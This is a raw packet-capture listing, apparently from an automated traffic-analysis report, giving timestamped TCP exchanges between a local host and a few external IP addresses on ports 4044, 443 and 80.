                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.735296965 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.735307932 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.781630039 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.793323994 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.793359995 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.793453932 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.794353962 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.794469118 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.794500113 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.794684887 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.794750929 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.794750929 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.794994116 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795331001 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795357943 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795404911 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795416117 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795433044 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795461893 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795634031 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795660973 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795718908 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.795968056 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796021938 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796088934 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796113968 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796185017 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796447992 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796487093 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796621084 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796686888 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796742916 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796849012 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796916008 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.796955109 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797056913 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797063112 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797128916 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797238111 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797306061 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797367096 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797466040 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797499895 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797545910 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797545910 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797566891 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797630072 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797696114 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797780991 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797888041 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.797960043 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.798053980 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.798091888 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.798120022 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.798191071 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:56.022965908 CET8049702178.237.33.50192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:56.023906946 CET4970280192.168.2.3178.237.33.50
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:56.132569075 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:57.759279013 CET49703443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:57.759350061 CET44349703144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:57.759898901 CET44349703144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:57.760538101 CET49703443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:57.830924988 CET49703443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:57.830980062 CET44349703144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.398247957 CET44349703144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.398319960 CET44349703144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.398376942 CET49703443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.398422003 CET44349703144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.398452997 CET49703443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.398494959 CET49703443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.399075985 CET44349703144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.399216890 CET49703443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.409157038 CET49703443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:58.409204006 CET44349703144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:04.209074020 CET497014044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:04.283273935 CET404449701194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:04.283816099 CET497014044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:04.285429955 CET497014044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:04.348797083 CET404449701194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.665258884 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.665306091 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.665395975 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.695545912 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.695593119 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.785511017 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.785639048 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.788167000 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.788187027 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.788718939 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.860928059 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:10.665107965 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:10.665159941 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.076064110 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.089014053 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.203646898 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.598910093 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.598969936 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.598989010 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599009991 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599039078 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599052906 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599072933 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599080086 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599100113 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599143982 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599173069 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599256039 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599301100 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599340916 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599351883 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599378109 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.599658012 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623337030 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623394012 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623485088 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623507977 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623529911 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623559952 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623579025 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623631001 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623662949 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623675108 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.623712063 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.624051094 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.624125004 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.624150038 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.624166012 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.624222040 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.624253988 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648077011 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648133993 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648247957 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648288965 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648319960 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648375034 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648564100 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648613930 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648655891 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648685932 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.648720026 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649161100 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649183035 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649202108 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649240017 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649240971 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649277925 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649293900 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649346113 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649385929 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649667978 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649713039 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649760962 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649785995 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.649811029 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.650135040 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.650254965 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.650321007 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.650338888 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.650352955 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.650397062 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.650415897 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.650928974 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.650979042 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.651021004 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.651043892 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.651071072 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.651112080 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.674628973 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.674721003 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.674756050 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.674796104 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.674828053 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.674853086 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675085068 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675139904 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675172091 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675189018 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675216913 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675407887 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675534964 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675581932 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675612926 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675630093 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675654888 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.675772905 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676130056 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676178932 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676218033 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676234007 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676275969 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676304102 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676656008 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676708937 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676738024 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676752090 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676779985 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.676804066 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677151918 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677201986 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677232981 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677248955 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677275896 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677596092 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677654028 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677704096 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677747011 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677758932 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677787066 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.677833080 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678117990 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678168058 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678195000 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678208113 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678234100 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678252935 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678575993 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678626060 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678706884 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678731918 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678792953 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.678812027 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.679124117 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.679171085 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.679222107 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.679251909 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.679280043 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.679310083 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.679982901 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680031061 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680073023 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680109024 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680141926 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680162907 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680414915 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680468082 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680501938 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680533886 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680548906 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.680699110 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698184967 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698229074 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698277950 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698290110 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698322058 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698337078 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698546886 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698589087 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698626041 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698632956 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.698704004 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699136972 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699178934 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699233055 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699242115 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699254990 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699623108 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699666977 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699712992 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699721098 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699742079 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.699774981 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.700215101 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.700254917 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.700303078 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.700310946 CET44349704144.76.136.153192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.700324059 CET49704443192.168.2.3144.76.136.153
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.700907946 CET44349704144.76.136.153192.168.2.3
